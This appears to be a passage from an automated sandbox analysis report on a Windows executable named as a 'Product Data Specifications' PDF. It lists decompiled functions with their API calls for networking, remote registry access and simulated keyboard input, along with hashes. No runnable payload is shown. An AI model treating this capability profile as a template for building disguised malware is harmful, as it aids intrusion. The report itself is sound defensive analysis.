                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                              • String ID:
                              • API String ID: 3638380555-0
                              • Opcode ID: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                              • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
                              • Opcode Fuzzy Hash: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                              • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
                              Function 0046C84C Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 308COMMON
                              Download Yara Rule
                              APIs
                              • VariantInit.OLEAUT32(?), ref: 0046C96E
                                • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Variant$Copy$ClearErrorInitLast
                              • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                              • API String ID: 3207048006-625585964
                              • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                              • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                              • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                              • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                              Function 00465489 Relevance: 10.8, APIs: 7, Instructions: 281networkmemoryCOMMON
                              Download Yara Rule
                              APIs
                              • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                                • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                              • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
                              • gethostbyname.WSOCK32(?), ref: 004655A6
                              • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                              • _memmove.LIBCMT ref: 004656CA
                              • GlobalFree.KERNEL32(00000000), ref: 0046575C
                              • WSACleanup.WSOCK32 ref: 00465762
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                              • String ID:
                              • API String ID: 2945290962-0
                              • Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                              • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                              • Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                              • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                              Function 004404E8 Relevance: 10.8, APIs: 7, Instructions: 271windowCOMMON
                              Download Yara Rule
                              APIs
                              • GetSystemMetrics.USER32(0000000F), ref: 00440527
                              • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                              • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                              • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                              • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                              • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                              • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                              • String ID:
                              • API String ID: 1457242333-0
                              • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                              • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                              • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                              • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                              Function 0046B6AB Relevance: 10.8, APIs: 7, Instructions: 258registryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: ConnectRegistry_memmove_wcslen
                              • String ID:
                              • API String ID: 15295421-0
                              • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                              • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
                              • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                              • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                              Function 00467511 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 213COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                              • _wcstok.LIBCMT ref: 004675B2
                                • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                              • _wcscpy.LIBCMT ref: 00467641
                              • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                              • _wcslen.LIBCMT ref: 00467793
                              • _wcslen.LIBCMT ref: 004677BD
                                • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                              • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                              • String ID: X
                              • API String ID: 780548581-3081909835
                              • Opcode ID: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                              • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
                              • Opcode Fuzzy Hash: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                              • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
                              Function 0044734F Relevance: 10.7, APIs: 7, Instructions: 210COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                              • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                              • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                              • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                              • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                              • CloseFigure.GDI32(?), ref: 0044751F
                              • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                              • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                              • String ID:
                              • API String ID: 4082120231-0
                              • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                              • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                              • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                              • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                              Function 0046B280 Relevance: 10.7, APIs: 7, Instructions: 196registryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                              • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                              • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                              • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                              • String ID:
                              • API String ID: 2027346449-0
                              • Opcode ID: f0ceecdc90b01f2c9ddf0369269a16fa16a69f0e3d9f986347dd5438d1ccccc0
                              • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                              • Opcode Fuzzy Hash: f0ceecdc90b01f2c9ddf0369269a16fa16a69f0e3d9f986347dd5438d1ccccc0
                              • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                              Function 0047A66E Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                              • GetMenu.USER32 ref: 0047A703
                              • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                              • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                              • _wcslen.LIBCMT ref: 0047A79E
                              • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                              • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                              • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                              • String ID:
                              • API String ID: 3257027151-0
                              • Opcode ID: 80d25b5d47cdb8856cfd5c6f23c0a19e515c97fff049208cbae9d6eea43d64d6
                              • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                              • Opcode Fuzzy Hash: 80d25b5d47cdb8856cfd5c6f23c0a19e515c97fff049208cbae9d6eea43d64d6
                              • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                              Function 0046D230 Relevance: 10.7, APIs: 7, Instructions: 170networkCOMMON
                              Download Yara Rule
                              APIs
                              • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                              • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: ErrorLastselect
                              • String ID:
                              • API String ID: 215497628-0
                              • Opcode ID: 0902b8d125b16e906fbee135168885a915a185ebb0dc395c6f8acc5970aa3ebc
                              • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                              • Opcode Fuzzy Hash: 0902b8d125b16e906fbee135168885a915a185ebb0dc395c6f8acc5970aa3ebc
                              • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                              Function 004443FC Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON
                              Download Yara Rule
                              APIs
                              • GetParent.USER32(?), ref: 0044443B
                              • GetKeyboardState.USER32(?), ref: 00444450
                              • SetKeyboardState.USER32(?), ref: 004444A4
                              • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                              • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                              • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                              • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: MessagePost$KeyboardState$Parent
                              • String ID:
                              • API String ID: 87235514-0
                              • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                              • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                              • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                              • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                              Function 004445F4 Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON
                              Download Yara Rule
                              APIs
                              • GetParent.USER32(?), ref: 00444633
                              • GetKeyboardState.USER32(?), ref: 00444648
                              • SetKeyboardState.USER32(?), ref: 0044469C
                              • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                              • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                              • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                              • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: MessagePost$KeyboardState$Parent
                              • String ID:
                              • API String ID: 87235514-0
                              • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                              • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                              • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                              • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
                              Function 0045537F Relevance: 10.6, APIs: 7, Instructions: 149windowCOMMON
                              Download Yara Rule
                              APIs
                              • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                              • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                              • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                              • DeleteObject.GDI32(?), ref: 00455736
                              • DeleteObject.GDI32(?), ref: 00455744
                              • DestroyIcon.USER32(?), ref: 00455752
                              • DestroyWindow.USER32(?), ref: 00455760
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                              • String ID:
                              • API String ID: 2354583917-0
                              • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                              • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
                              • Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                              • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
                              Function 0044982A Relevance: 10.6, APIs: 7, Instructions: 135COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                              • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                              • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                              • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                              Function 0044882A Relevance: 10.6, APIs: 7, Instructions: 130windowCOMMON
